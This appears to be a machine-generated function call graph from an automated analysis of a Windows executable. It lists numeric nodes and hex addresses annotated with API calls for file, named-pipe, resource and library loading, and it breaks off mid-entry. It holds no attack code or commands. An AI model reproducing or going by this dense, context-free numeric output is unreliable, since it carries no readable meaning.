62475->62469 62520 998c50 62476->62520 62479 998c50 38 API calls 62477->62479 62481 9b3b10 GetLastError 62478->62481 62478->62493 62482 9b3917 62479->62482 62481->62493 62484 9b68d0 86 API calls 62482->62484 62483 9b38b5 62545 9b68d0 62483->62545 62488 9b392a 62484->62488 62487 9b3b2e 62487->62456 62489 9b3b33 62487->62489 62558 9affb0 28 API calls 62488->62558 62561 9b30d0 101 API calls 62489->62561 62491 939140 30 API calls 62491->62493 62493->62446 62493->62456 62493->62461 62493->62474 62493->62487 62493->62491 62562 9affb0 28 API calls 62493->62562 62494 9b38c8 62494->62386 62495 9b3957 62495->62429 62496 9b3983 62495->62496 62559 9affb0 28 API calls 62495->62559 62497 99fd50 13 API calls 62496->62497 62497->62494 62499->62391 62502 99fd7d 62500->62502 62503 99fdbb 62500->62503 62501 a4cf16 13 API calls 62501->62503 62502->62501 62503->62258 62504->62403 62505->62390 62509 9b34e4 62506->62509 62517 9b34dc 62506->62517 62507 9b35d3 62511 928fc0 2 API calls 62507->62511 62508 a4566b 5 API calls 62510 9b3488 62508->62510 62509->62507 62513 9b3504 62509->62513 62509->62517 62510->62383 62510->62384 62512 9b35dd 62511->62512 62514 9b3534 FindFirstFileW 62513->62514 62513->62517 62515 9b3563 62514->62515 62516 9b3580 GetLastError 62514->62516 62515->62517 62518 9b359d FindClose 62515->62518 62516->62515 62517->62508 62518->62517 62519->62473 62521 9292f0 36 API calls 62520->62521 62531 998c8e 62521->62531 62522 998e00 62523 928fc0 2 API calls 62522->62523 62524 998e0a 62523->62524 62526 928fc0 2 API calls 62524->62526 62525 998dcf 62527 a4566b 5 API calls 62525->62527 62528 998e14 62526->62528 62530 998df0 62527->62530 62529 998e2b 62528->62529 62533 a4cf16 13 API calls 62528->62533 62529->62483 62530->62483 62531->62522 62531->62525 62531->62531 62532 998df6 62531->62532 62535 998d07 62531->62535 62534 928fc0 2 API calls 62532->62534 62536 998e59 62533->62536 62534->62522 62537 998d15 62535->62537 62564 998e70 RtlAllocateHeap RaiseException 62535->62564 62536->62483 62565 a4cf31 24 API calls 62537->62565 62540 998d2d 62540->62524 62542 998d61 62540->62542 62566 928d50 26 API calls 62540->62566 62542->62524 62542->62542 62543 998db1 62542->62543 62543->62525 62567 998e30 13 API calls 62543->62567 62546 99fd50 13 API calls 62545->62546 62554 9b6916 62546->62554 62547 9b69c1 62548 9b69c8 62547->62548 62549 9b6a35 62547->62549 62550 92d350 84 API calls 62548->62550 62570 9affb0 28 API calls 62549->62570 62552 9b69e3 62550->62552 62554->62547 62555 92d350 84 API calls 62554->62555 62557 9b69f6 62554->62557 62568 9affb0 28 API calls 62554->62568 62555->62554 62557->62494 62558->62495 62559->62495 62560->62433 62561->62456 62562->62493 62563->62452 62564->62537 62565->62540 62566->62542 62567->62525 62568->62554 62570->62557 62572 99ce86 62571->62572 62580 99cec5 62571->62580 62574 99cea2 62572->62574 62582 928d50 26 API calls 62572->62582 62573 928fc0 2 API calls 62579 99ceea 62573->62579 62583 928dc0 24 API calls 62574->62583 62577 99ceb2 62584 928dc0 24 API calls 62577->62584 62579->62088 62580->62573 62581 99ced0 62580->62581 62581->62088 62582->62574 62583->62577 62584->62580 62585->62096 62587 9292f0 36 API calls 62586->62587 62588 9354ff 62587->62588 62589 935505 62588->62589 62590 93556f 62588->62590 62593 935525 62589->62593 62594 935532 62589->62594 62591 928fc0 2 API calls 62590->62591 62592 935579 62591->62592 62620 935370 34 API calls 62593->62620 62594->62594 62621 928e70 26 API calls 62594->62621 62597 935530 62598 9b3c20 62597->62598 62599 9b35e0 84 API calls 62598->62599 62600 9b3c64 62599->62600 62601 9354d0 46 API calls 62600->62601 62602 9b3c73 PathIsUNCW 62601->62602 62603 9b3c93 62602->62603 62604 9b3d0b PathFileExistsW 62603->62604 62605 9b3cf8 62603->62605 62622 928c70 26 API calls 62603->62622 62604->62116 62605->62604 62606 928fc0 2 API calls 62605->62606 62608 9b3d32 62606->62608 62623 a45ecb 62609->62623 62612->62121 62614->62129 62615->62144 62617->62150 62619->62101 62620->62597 62621->62597 62622->62605 62624 a45ed4 62623->62624 62625 a456ad 3 API calls 62624->62625 62626 9d17d4 62625->62626 62626->62167 62628 a561ac 62627->62628 62629 a56183 RtlFreeHeap 62627->62629 62628->62189 62629->62628 62630 a56198 62629->62630 62633 a4a2e9 13 API calls 62630->62633 62632 a5619e GetLastError 62632->62628 62633->62632 62634 9c8790 62727 9c9880 228 API calls 62634->62727 62636 9c87c5 62728 9cc780 86 API calls 62636->62728 62638 9c87cd 62663 9d2fd0 62638->62663 62642 9c87e6 62643 9c87ea 62642->62643 62706 9ba4d0 38 API calls 62642->62706 62645 9c8814 62707 9c58d0 62645->62707 62664 998be0 26 API calls 62663->62664 62665 9d2ffe 62664->62665 62666 998be0 26 API calls 62665->62666 62667 9d3007 62666->62667 62729 9f0190 62667->62729 62669 9d300f 62756 9db820 47 API calls 62669->62756 62671 9d301c 62757 9287a0 52 API calls 62671->62757 62673 9c87df 62674 9cccb0 62673->62674 62675 9ccd08 62674->62675 62683 9ccce7 62674->62683 62676 9ccebe 62675->62676 62677 9ccd36 CreateFileW 62675->62677 62684 9ccd28 62675->62684 62679 928fc0 2 API calls 62676->62679 62678 9ccd5f 62677->62678 62680 9ccd86 GetLastError 62678->62680 62681 9cce07 62678->62681 62682 9ccec8 62679->62682 62780 9b6f00 73 API calls 62680->62780 62764 9ee350 62681->62764 62683->62675 62683->62676 62778 9b13c0 26 API calls 62683->62778 62684->62677 62779 9b13c0 26 API calls 62684->62779 62689 9cce10 62691 9cce9e 62689->62691 62692 9cce1a 62689->62692 62690 9ccd9d 62693 9b35e0 84 API calls 62690->62693 62773 9ceb90 62691->62773 62695 9cce1f GetLastError 62692->62695 62705 9cce65 62692->62705 62698 9ccdb5 62693->62698 62782 9b6f00 73 API calls 62695->62782 62781 9bd490 38 API calls 62698->62781 62699 9cce39 62701 9b35e0 84 API calls 62699->62701 62703 9cce4d 62701->62703 62783 9bd490 38 API calls 62703->62783 62705->62642 62706->62645 62872 9ccfb0 62707->62872 62727->62636 62728->62638 62730 928b00 26 API calls 62729->62730 62731 9f01cf 62730->62731 62732 9f01f0 GetFileVersionInfoSizeW 62731->62732 62758 928c70 26 API calls 62731->62758 62734 9f0208 62732->62734 62738 9f0215 62732->62738 62736 9d1790 3 API calls 62734->62736 62735 9f01ed 62735->62732 62737 9f0211 62736->62737 62737->62738 62739 9f023a GetFileVersionInfoW 62737->62739 62759 928c70 26 API calls 62737->62759 62738->62669 62739->62738 62741 9f0251 62739->62741 62743 9292f0 36 API calls 62741->62743 62742 9f0237 62742->62739 62744 9f0256 62743->62744 62745 9f03a0 62744->62745 62750 9f0260 62744->62750 62746 928fc0 2 API calls 62745->62746 62747 9f03aa 62746->62747 62763 9f03d0 WaitForSingleObject GetExitCodeThread TerminateThread CloseHandle 62747->62763 62749 9f03b8 62749->62669 62760 9287a0 52 API calls 62750->62760 62752 9f02b8 62755 9f02cf 62752->62755 62761 928c70 26 API calls 62752->62761 62755->62738 62762 928e70 26 API calls 62755->62762 62756->62671 62757->62673 62758->62735 62759->62742 62760->62752 62761->62755 62762->62738 62763->62749 62765 9d1790 3 API calls 62764->62765 62766 9ee396 62765->62766 62767 9ee3eb SetFilePointer 62766->62767 62768 9ee39d 62766->62768 62771 9ee4c6 SetFilePointer 62766->62771 62769 9ee404 GetLastError 62767->62769 62770 9ee412 ReadFile 62767->62770 62768->62689 62769->62768 62769->62770 62770->62766 62770->62768 62771->62768 62772 9ee4ee ReadFile 62771->62772 62772->62768 62784 9cf6a0 62773->62784 62775 9ceb9f 62776 9cceac 62775->62776 62821 9cfb80 62775->62821 62776->62642 62778->62675 62779->62677 62780->62690 62782->62699 62785 9cf763 62784->62785 62786 9cf6eb SetFilePointer 62784->62786 62785->62775 62787 9cf716 GetLastError 62786->62787 62788 9cf7a1 62786->62788 62855 9b6f00 73 API calls 62787->62855 62789 9292f0 36 API calls 62788->62789 62791 9cf7c1 62789->62791 62794 9cfaea 62791->62794 62804 9cf9b0 62791->62804 62819 9cf7ff 62791->62819 62792 9cf733 62793 9b35e0 84 API calls 62792->62793 62795 9cf74b 62793->62795 62796 928fc0 2 API calls 62794->62796 62856 9bd490 38 API calls 62795->62856 62797 9cfaf4 62796->62797 62863 9311f0 RaiseException 62797->62863 62800 9cf802 ReadFile 62802 9cfa6c GetLastError 62800->62802 62800->62819 62801 9cfb00 62801->62775 62861 9b6f00 73 API calls 62802->62861 62804->62775 62805 9cfa89 62807 9b35e0 84 API calls 62805->62807 62808 9cfaa3 62807->62808 62862 9bd490 38 API calls 62808->62862 62809 9cf858 ReadFile 62810 9cfa0b GetLastError 62809->62810 62809->62819 62859 9b6f00 73 API calls 62810->62859 62812 9cfa5d 62812->62804 62814 9cfa28 62815 9b35e0 84 API calls 62814->62815 62816 9cfa42 62815->62816 62860 9bd490 38 API calls 62816->62860 62817 928b00 26 API calls 62817->62819 62819->62794 62819->62797 62819->62800 62819->62802 62819->62804 62819->62809 62819->62810 62819->62812 62819->62817 62857 9c1a20 IsProcessorFeaturePresent RaiseException EnterCriticalSection 62819->62857 62858 928e70 26 API calls 62819->62858 62822 9cfbbb SetFilePointer 62821->62822 62826 9cfe3c 62821->62826 62823 9cfc6a 62822->62823 62824 9cfbe6 GetLastError 62822->62824 62823->62826 62827 9cfc90 ReadFile 62823->62827 62864 9b6f00 73 API calls 62824->62864 62826->62776 62829 9cff13 GetLastError 62827->62829 62854 9cfcb2 62827->62854 62828 9cfc00 62831 9b35e0 84 API calls 62828->62831 62870 9b6f00 73 API calls 62829->62870 62834 9cfc18 62831->62834 62832 9292f0 36 API calls 62832->62854 62833 9cff30 62835 9b35e0 84 API calls 62833->62835 62865 9bd490 38 API calls 62834->62865 62837 9cff45 62835->62837 62836 9cff89 62840 928fc0 2 API calls 62836->62840 62871 9bd490 38 API calls 62837->62871 62842 9cff93 62840->62842 62844 9cfd12 ReadFile 62845 9cfe69 GetLastError 62844->62845 62844->62854 62868 9b6f00 73 API calls 62845->62868 62847 9cfe86 62848 9b35e0 84 API calls 62847->62848 62851 9cfe9b 62848->62851 62850 9cfeb3 62850->62826 62869 9bd490 38 API calls 62851->62869 62853 928b00 26 API calls 62853->62854 62854->62826 62854->62827 62854->62829 62854->62832 62854->62836 62854->62844 62854->62845 62854->62850 62854->62853 62866 9c1a20 IsProcessorFeaturePresent RaiseException EnterCriticalSection 62854->62866 62867 928e70 26 API calls 62854->62867 62855->62792 62857->62819 62858->62819 62859->62814 62861->62805 62863->62801 62864->62828 62866->62854 62867->62854 62868->62847 62870->62833 62873 9cd057 62872->62873 62880 9ce9f0 RaiseException 62873->62880 62875 9cd05e 62876 9292f0 36 API calls 62875->62876 62877 9cd12e 62876->62877 62878 928fc0 2 API calls 62877->62878 62879 9cd189 62878->62879 62880->62875 62882 a5607d GetLastError 62883 a56094 62882->62883 62884 a5609a 62882->62884 62915 a583f0 6 API calls 62883->62915 62902 a560a0 SetLastError 62884->62902 62905 a5842f 62884->62905 62916 a581df 62905->62916 62908 a58469 TlsSetValue 62909 a560b8 62909->62902 62910 a57ed6 62909->62910 62913 a57eef 62910->62913 62911 a57f0e RtlAllocateHeap 62912 a57f23 62911->62912 62911->62913 62924 a4a2e9 13 API calls 62912->62924 62913->62911 62913->62912 62915->62884 62917 a5820d 62916->62917 62920 a58209 62916->62920 62917->62920 62923 a58118 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 62917->62923 62919 a58221 62919->62920 62921 a58227 GetProcAddress 62919->62921 62920->62908 62920->62909 62921->62920 62922 a58237 62921->62922 62922->62920 62923->62919 62924->62912 62925 9b1e00 62930 9b7020 LoadLibraryW 62925->62930 62928 9b7020 3 API calls 62929 9b1e30 SendMessageW SendMessageW 62928->62929 62931 9b707b GetProcAddress 62930->62931 62932 9b708b 62930->62932 62931->62932 62933 9b70fe FreeLibrary 62932->62933 62934 9b1e1e 62932->62934 62933->62934 62934->62928 62935 9c7100 63208 9ea980 62935->63208 62937 9c7130 62938 9292f0 36 API calls 62937->62938 62939 9c713c 62938->62939 62940 9c7453 62939->62940 62943 9c716f 62939->62943 62944 9c7164 62939->62944 62941 928fc0 2 API calls 62940->62941 62942 9c745d 62941->62942 62946 9292f0 36 API calls 62942->62946 62962 9c74c6 62942->62962 63377 928e70 26 API calls 62943->63377 63376 935370 34 API calls 62944->63376 62949 9c7494 62946->62949 62948 9c716d 63214 a3e0b0 62948->63214 62951 9c749a 62949->62951 62952 9c7506 62949->62952 62956 939140 30 API calls 62951->62956 62954 928fc0 2 API calls 62952->62954 62953 9c71a3 62955 9292f0 36 API calls 62953->62955 62961 9c7510 62954->62961 62957 9c71ab 62955->62957 62958 9c74bb 62956->62958 62957->62940 63221 99f130 62957->63221 63381 9d3460 67 API calls 62958->63381 62959 9c7958 62963 9292f0 36 API calls 62959->62963 63006 9c79d9 62959->63006 62966 9354d0 46 API calls 62961->62966 63115 9c757e 62961->63115 62968 9c7970 62963->62968 62970 9c759d 62966->62970 62972 9c797a 62968->62972 62973 9c7a73 62968->62973 62969 9c7767 62974 9292f0 36 API calls 62969->62974 63382 9d2690 62970->63382 62988 939140 30 API calls 62972->62988 62976 928fc0 2 API calls 62973->62976 62978 9c7775 62974->62978 62975 a4566b 5 API calls 62979 9c7a4d 62975->62979 62980 9c7a7d 62976->62980 62977 9c71dd 63238 9bd040 62977->63238 62983 9c777f 62978->62983 62984 9c7a55 62978->62984 62987 9c7aba 62980->62987 62991 9292f0 36 API calls 62980->62991 62994 99f130 36 API calls 62983->62994 62985 928fc0 2 API calls 62984->62985 62990 9c7a5f 62985->62990 62992 9c799b 62988->62992 62995 928fc0 2 API calls 62990->62995 62996 9c7b08 62991->62996 63403 9d28a0 66 API calls 62992->63403 62993 9b11c0 38 API calls 62998 9c71fd 62993->62998 63000 9c7797 62994->63000 63001 9c7a69 62995->63001 63002 9c7cfe 62996->63002 63010 9c7b3b 62996->63010 63011 9c7b30 62996->63011 63250 9eaa20 62998->63250 63004 9c77a4 63000->63004 63400 9b4250 26 API calls 63000->63400 63005 928fc0 2 API calls 63001->63005 63003 928fc0 2 API calls 63002->63003 63007 9c7d08 63003->63007 63014 a4cf16 13 API calls 63004->63014 63038 9c77b8 63004->63038 63005->62973 63300 9d1d00 63006->63300 63330 9311f0 RaiseException 63007->63330 63405 928e70 26 API calls 63010->63405 63404 935370 34 API calls 63011->63404 63012 9c79aa 63012->63006 63017 939140 30 API calls 63012->63017 63014->63038 63017->63006 63019 9c7d14 63331 9c9a90 228 API calls 63019->63331 63020 9c7b39 63023 9b68d0 86 API calls 63020->63023 63122 9c7b59 63023->63122 63024 9c7d51 63027 9292f0 36 API calls 63024->63027 63026 9c75bd 63026->63115 63398 9d2270 27 API calls 63026->63398 63125 9c7d62 63027->63125 63028 9c720f 63031 9c72ad 63028->63031 63032 9c7302 SetEvent 63028->63032 63029 9292f0 36 API calls 63030 9c783e 63029->63030 63030->62990 63035 9c7848 63030->63035 63036 9d1640 17 API calls 63031->63036 63260 9eb000 63032->63260 63033 9c78c6 63402 9d2270 27 API calls 63033->63402 63034 9c7fae 63042 928fc0 2 API calls 63034->63042 63055 939140 30 API calls 63035->63055 63041 9c72b5 63036->63041 63038->63029 63092 9c786f 63038->63092 63046 9292f0 36 API calls 63041->63046 63047 9c7fb8 63042->63047 63043 9c7367 63049 9c73b8 63043->63049 63273 9d1640 63043->63273 63056 9c72ba 63046->63056 63332 9db820 47 API calls 63047->63332 63048 99fd50 13 API calls 63058 9c7cdb 63048->63058 63124 9c73ec 63049->63124 63379 9eaf20 55 API calls 63049->63379 63051 9c7e1a 63060 9292f0 36 API calls 63051->63060 63052 99fd50 13 API calls 63052->63122 63064 9c7866 63055->63064 63056->62940 63065 9c72c2 63056->63065 63067 99fd50 13 API calls 63058->63067 63090 9c7e22 63060->63090 63063 9c7412 63380 9eab20 CloseHandle 63063->63380 63401 9d3460 67 API calls 63064->63401 63083 9d33b0 67 API calls 63065->63083 63066 9c7ff7 63074 9292f0 36 API calls 63066->63074 63068 9c7cea 63067->63068 63069 9292f0 36 API calls 63075 9c737c 63069->63075 63071 9292f0 36 API calls 63071->63122 63080 9c8003 63074->63080 63075->62940 63081 9c7384 63075->63081 63077 9b13c0 26 API calls 63077->63125 63084 9c853d 63080->63084 63333 9c9a90 228 API calls 63080->63333 63286 9cd190 63081->63286 63082 9c743d 63087 9c72e4 63083->63087 63085 928fc0 2 API calls 63084->63085 63088 9c8547 63085->63088 63093 9cd190 142 API calls 63087->63093 63426 9311f0 RaiseException 63088->63426 63089 9c7e4c 63099 9c7e63 63089->63099 63412 928c70 26 API calls 63089->63412 63090->63034 63090->63089 63411 928c70 26 API calls 63090->63411 63092->62959 63092->63033 63101 9c72f1 SetEvent 63093->63101 63413 9db820 47 API calls 63099->63413 63100 939140 30 API calls 63100->63125 63101->63063 63102 9c8027 63334 9287a0 52 API calls 63102->63334 63103 9c8553 63112 9c7925 63112->62975 63113 9c7e73 63414 9287a0 52 API calls 63113->63414 63115->62959 63115->63112 63399 9cb820 237 API calls 63115->63399 63116 9c8039 63418 9c9880 228 API calls 63116->63418 63118 9b68d0 86 API calls 63118->63122 63120 9c7e84 63127 9292f0 36 API calls 63120->63127 63122->63002 63122->63007 63122->63052 63122->63071 63122->63118 63135 9c7c4e 63122->63135 63160 9c7cbf 63122->63160 63406 935370 34 API calls 63122->63406 63407 928e70 26 API calls 63122->63407 63408 9cb900 27 API calls 63122->63408 63124->63049 63125->63034 63125->63051 63125->63077 63125->63100 63410 9db820 47 API calls 63125->63410 63126 9c8064 63419 9cc780 86 API calls 63126->63419 63130 9c7eaa 63127->63130 63130->63034 63132 9c7eb2 63130->63132 63131 9c806d 63133 9cccb0 139 API calls 63131->63133 63137 9c7ed7 63132->63137 63415 928c70 26 API calls 63132->63415 63134 9c8075 63133->63134 63136 9292f0 36 API calls 63134->63136 63139 9292f0 36 API calls 63135->63139 63140 9c807a 63136->63140 63416 9db820 47 API calls 63137->63416 63143 9c7c56 63139->63143 63140->63084 63146 9c80c6 63140->63146 63152 9c809e 63140->63152 63142 9c7ee7 63417 9287a0 52 API calls 63142->63417 63143->63002 63145 9c7c5e 63143->63145 63147 99f130 36 API calls 63145->63147 63148 9292f0 36 API calls 63146->63148 63149 9c7c78 63147->63149 63150 9c80cb 63148->63150 63156 9c7c85 63149->63156 63409 99ef50 28 API calls 63149->63409 63150->63084 63335 9d33b0 63150->63335 63151 9c80b1 63151->63146 63152->63146 63152->63151 63154 998be0 26 API calls 63152->63154 63154->63146 63155 9c7ef7 63156->63007 63156->63160 63159 9cd190 142 API calls 63161 9c8105 63159->63161 63160->63048 63162 9292f0 36 API calls 63161->63162 63163 9c8114 63162->63163 63163->63084 63164 9354d0 46 API calls 63163->63164 63165 9c8138 63164->63165 63341 9e9820 55 API calls 63165->63341 63167 9c8148 63168 9c815e 63167->63168 63169 9292f0 36 API calls 63167->63169 63168->63167 63170 9c816b 63169->63170 63170->63084 63171 9c819e 63170->63171 63172 9c8193 63170->63172 63421 928e70 26 API calls 63171->63421 63420 935370 34 API calls 63172->63420 63175 9c819c 63176 9c81aa 63175->63176 63342 9e9970 63176->63342 63178 9c81be 63179 9292f0 36 API calls 63178->63179 63180 9c81fa 63179->63180 63180->63084 63181 9c822d 63180->63181 63182 9c8222 63180->63182 63423 928e70 26 API calls 63181->63423 63422 935370 34 API calls 63182->63422 63185 9c822b 63186 9b68d0 86 API calls 63185->63186 63188 9c824c 63186->63188 63187 9292f0 36 API calls 63194 9c82d1 63187->63194 63188->63088 63188->63187 63189 9c8352 63189->63088 63425 9d28a0 66 API calls 63189->63425 63192 9c8372 63193 939140 30 API calls 63192->63193 63195 9c8384 63193->63195 63194->63084 63194->63088 63194->63189 63196 939140 30 API calls 63194->63196 63424 9d28a0 66 API calls 63194->63424 63197 9292f0 36 API calls 63195->63197 63201 9c83fd 63195->63201 63196->63194 63198 9c83b3 63197->63198 63198->63084 63199 9c83bb 63198->63199 63204 939140 30 API calls 63199->63204 63200 9c8467 63203 99fd50 13 API calls 63200->63203 63201->63200 63202 a4cf16 13 API calls 63201->63202 63202->63200 63207 9c848b 63203->63207 63205 9c83db 63204->63205 63205->63201 63206 939140 30 API calls 63205->63206 63206->63201 63209 9292f0 36 API calls 63208->63209 63210 9ea9bc 63209->63210 63211 928fc0 2 API calls 63210->63211 63213 9ea9c2 63210->63213 63212 9eaa18 63211->63212 63213->62937 63215 a3e0be 63214->63215 63216 a3e119 63215->63216 63217 a3e0d8 WideCharToMultiByte 63215->63217 63216->62953 63218 a3e115 63217->63218 63219 a3e0f4 63217->63219 63218->62953 63220 a3e0fa WideCharToMultiByte 63219->63220 63220->63218 63222 99f1e3 63221->63222 63223 99f144 63221->63223 63222->62977 63378 9b4250 26 API calls 63222->63378 63223->63222 63427 935170 7 API calls 63223->63427 63225 99f159 63225->63222 63226 99f163 FindResourceW 63225->63226 63226->63222 63227 99f177 63226->63227 63428 935230 LoadResource LockResource SizeofResource 63227->63428 63229 99f181 63229->63222 63230 99f18a WideCharToMultiByte 63229->63230 63231 99f1aa 63230->63231 63232 99f1f7 63230->63232 63233 99f1c7 WideCharToMultiByte 63231->63233 63429 99f210 26 API calls 63231->63429 63234 928fc0 2 API calls 63232->63234 63233->63222 63233->63232 63236 99f201 63234->63236 63237 99f1c5 63237->63233 63239 9292f0 36 API calls 63238->63239 63240 9bd06e 63239->63240 63241 9bd0c3 63240->63241 63244 9bd074 63240->63244 63242 928fc0 2 API calls 63241->63242 63243 9bd0cd 63242->63243 63245 9bd0a0 63244->63245 63246 9bd093 63244->63246 63431 9b4340 28 API calls 63245->63431 63430 935370 34 API calls 63246->63430 63249 9bd09e 63249->62993 63251 9eaa4c 63250->63251 63252 9eaa61 63250->63252 63251->63028 63253 998be0 26 API calls 63252->63253 63254 9eaa72 63253->63254 63432 9eb390 63254->63432 63256 9eaa7d 63257 9eaa8b CreateNamedPipeW 63256->63257 63258 9eaab8 CreateFileW 63256->63258 63257->63258 63259 9eaad3 63257->63259 63258->63259 63259->63028 63261 9eb046 63260->63261 63262 9eb030 63260->63262 63263 9292f0 36 API calls 63261->63263 63262->63043 63264 9eb04b 63263->63264 63265 9eb055 63264->63265 63266 9eb132 63264->63266 63269 9eb140 55 API calls 63265->63269 63267 928fc0 2 API calls 63266->63267 63268 9eb13c 63267->63268 63270 9eb077 63269->63270 63271 998be0 26 API calls 63270->63271 63272 9eb084 63271->63272 63272->63043 63274 9d1676 63273->63274 63275 9d1650 63273->63275 63550 9311f0 RaiseException 63274->63550 63275->63274 63276 9d1662 DeleteFileW 63275->63276 63276->63274 63276->63275 63278 9d1740 63279 9c7377 63278->63279 63281 a4cf16 13 API calls 63278->63281 63279->63069 63280 9d177c 63551 9311f0 RaiseException 63280->63551 63281->63279 63283 9d1788 63284 9ef600 2 API calls 63285 9d1691 63284->63285 63285->63278 63285->63280 63285->63284 63294 9cd2ec 63286->63294 63287 9cd53f 63288 9cb6f0 15 API calls 63287->63288 63289 9cd54e 63288->63289 63290 9cb6f0 15 API calls 63289->63290 63293 9cd560 63290->63293 63291 9ce990 RaiseException 63291->63294 63292 9cb6f0 15 API calls 63292->63294 63552 9311f0 RaiseException 63293->63552 63294->63287 63294->63291 63294->63292 63294->63293 63298 9d13a0 142 API calls 63294->63298 63296 9cd64c 63297 928fc0 2 API calls 63296->63297 63299 9cd656 63297->63299 63298->63294 63301 9d2690 27 API calls 63300->63301 63302 9d1d37 63301->63302 63303 9d1d3d 63302->63303 63304 9d1d53 63302->63304 63303->63112 63553 9d22d0 73 API calls 63304->63553 63306 9d1d5e 63554 9d24e0 11 API calls 63306->63554 63308 9d1d79 63309 9292f0 36 API calls 63308->63309 63328 9d1de9 63308->63328 63312 9d1d8e 63309->63312 63310 9d1edc 63558 9311f0 RaiseException 63310->63558 63311 9d1e3e 63313 9d1e51 63311->63313 63556 9d1ef0 39 API calls 63311->63556 63315 9d1d98 63312->63315 63316 9d1ed2 63312->63316 63323 9d1e7a 63313->63323 63557 9d1ef0 39 API calls 63313->63557 63321 939140 30 API calls 63315->63321 63320 928fc0 2 API calls 63316->63320 63318 9d1ee8 63320->63310 63324 9d1db6 63321->63324 63322 9d1e90 63322->63112 63323->63322 63325 a4cf16 13 API calls 63323->63325 63555 9d28a0 66 API calls 63324->63555 63325->63322 63327 9d1dc0 63327->63328 63329 939140 30 API calls 63327->63329 63328->63310 63328->63311 63329->63328 63330->63019 63331->63024 63332->63066 63333->63102 63334->63116 63336 9d33dc 63335->63336 63340 9c80f3 63335->63340 63337 a456ad 3 API calls 63336->63337 63338 9d33e6 63337->63338 63559 9f06f0 63338->63559 63340->63159 63341->63167 63343 9e999f 63342->63343 63344 9e99b5 63342->63344 63343->63178 63345 9292f0 36 API calls 63344->63345 63346 9e99ba 63345->63346 63347 9e9b8a 63346->63347 63348 9e99c4 63346->63348 63349 928fc0 2 API calls 63347->63349 63644 9287a0 52 API calls 63348->63644 63350 9e9b94 63349->63350 63351 9292f0 36 API calls 63350->63351 63367 9e9bd5 63351->63367 63353 9e99e9 63363 9e9a63 63353->63363 63645 9c1a20 IsProcessorFeaturePresent RaiseException EnterCriticalSection 63353->63645 63354 9e9d89 63355 928fc0 2 API calls 63354->63355 63356 9e9d93 63355->63356 63357 928fc0 2 API calls 63356->63357 63358 9e9d9d 63357->63358 63359 928d50 26 API calls 63359->63367 63360 9292f0 36 API calls 63360->63367 63362 9e9aaf 63362->63363 63364 9e9ad5 63362->63364 63363->63178 63365 9292f0 36 API calls 63364->63365 63366 9e9add 63365->63366 63646 92d460 72 API calls 63366->63646 63367->63354 63367->63356 63367->63359 63367->63360 63373 9e9d22 63367->63373 63374 9e9d32 63367->63374 63647 92d000 RtlAllocateHeap RaiseException 63367->63647 63369 9e9ae8 63370 998be0 26 API calls 63369->63370 63372 9e9af8 63370->63372 63372->63363 63373->63374 63375 998be0 26 API calls 63373->63375 63374->63178 63375->63374 63376->62948 63377->62948 63378->62977 63379->63063 63380->63082 63381->62962 63383 9d2831 63382->63383 63384 9d26ce EnumResourceLanguagesW 63382->63384 63383->63026 63393 9d270d 63384->63393 63385 9d275e 63387 9d276b 63385->63387 63390 a4cf16 13 API calls 63385->63390 63386 9d278e 63388 9d2861 63386->63388 63391 9d280f 63386->63391 63648 a50a2e 14 API calls 63387->63648 63650 9311f0 RaiseException 63388->63650 63390->63387 63391->63383 63395 a4cf16 13 API calls 63391->63395 63393->63385 63393->63388 63394 9d27a0 63393->63394 63394->63386 63649 964510 24 API calls 63394->63649 63395->63383 63396 9d286d 63396->63026 63399->62969 63400->63004 63401->63092 63403->63012 63404->63020 63405->63020 63406->63122 63407->63122 63408->63122 63409->63156 63410->63125 63411->63089 63412->63099 63413->63113 63414->63120 63415->63137 63416->63142 63417->63155 63418->63126 63419->63131 63420->63175 63421->63176 63422->63185 63423->63185 63424->63194 63425->63192 63426->63103 63427->63225 63428->63229 63429->63237 63430->63249 63431->63249 63433 9292f0 36 API calls 63432->63433 63434 9eb3ca 63433->63434 63435 9eb43a 63434->63435 63436 9eb3d0 63434->63436 63437 928fc0 2 API calls 63435->63437 63440 9eb3fd 63436->63440 63441 9eb3f2 63436->63441 63438 9eb444 63437->63438 63450 9eacb0 63438->63450 63449 928e70 26 API calls 63440->63449 63448 935370 34 API calls 63441->63448 63444 9eb3fb 63445 939140 30 API calls 63444->63445 63446 9eb425 63445->63446 63446->63256 63447 9eb488 63447->63256 63448->63444 63449->63444 63451 9ead27 63450->63451 63452 9eace7 63450->63452 63453 9292f0 36 API calls 63451->63453 63454 9292f0 36 API calls 63452->63454 63459 9ead2c 63453->63459 63455 9eacec 63454->63455 63456 9eacf4 63455->63456 63457 928fc0 2 API calls 63455->63457 63456->63447 63458 9eae4c 63457->63458 63460 9eacb0 55 API calls 63458->63460 63459->63455 63465 9ead64 63459->63465 63500 928d50 26 API calls 63459->63500 63464 9eae93 63460->63464 63462 9eae38 63463 928fc0 2 API calls 63462->63463 63463->63455 63466 9eacb0 55 API calls 63464->63466 63465->63462 63467 9eada8 63465->63467 63468 9eaec3 63466->63468 63473 9eb2a0 63467->63473 63468->63447 63470 9eadc3 63471 928b00 26 API calls 63470->63471 63472 9eadd2 63471->63472 63472->63447 63474 9eb2d6 63473->63474 63475 9eb315 WriteFile 63473->63475 63478 9292f0 36 API calls 63474->63478 63476 9eb34c 63475->63476 63477 9eb332 63475->63477 63501 9eb140 63476->63501 63480 9292f0 36 API calls 63477->63480 63481 9eb2db 63478->63481 63480->63481 63481->63470 63482 928fc0 2 API calls 63481->63482 63484 9eb2e3 63481->63484 63483 9eb387 63482->63483 63485 9292f0 36 API calls 63483->63485 63484->63470 63486 9eb3ca 63485->63486 63487 9eb43a 63486->63487 63488 9eb3d0 63486->63488 63489 928fc0 2 API calls 63487->63489 63492 9eb3fd 63488->63492 63493 9eb3f2 63488->63493 63490 9eb444 63489->63490 63491 9eacb0 54 API calls 63490->63491 63499 9eb488 63491->63499 63547 928e70 26 API calls 63492->63547 63546 935370 34 API calls 63493->63546 63496 9eb3fb 63497 939140 30 API calls 63496->63497 63498 9eb425 63497->63498 63498->63470 63499->63470 63500->63465 63502 9eb1b8 ReadFile 63501->63502 63503 9eb177 ConnectNamedPipe 63501->63503 63504 9eb24c 63502->63504 63505 9eb1e0 63502->63505 63503->63502 63506 9eb184 GetLastError 63503->63506 63507 9292f0 36 API calls 63504->63507 63505->63504 63508 9eb1e5 63505->63508 63506->63502 63509 9eb191 63506->63509 63511 9eb19c 63507->63511 63512 9354d0 46 API calls 63508->63512 63509->63502 63510 9eb197 63509->63510 63513 9292f0 36 API calls 63510->63513 63515 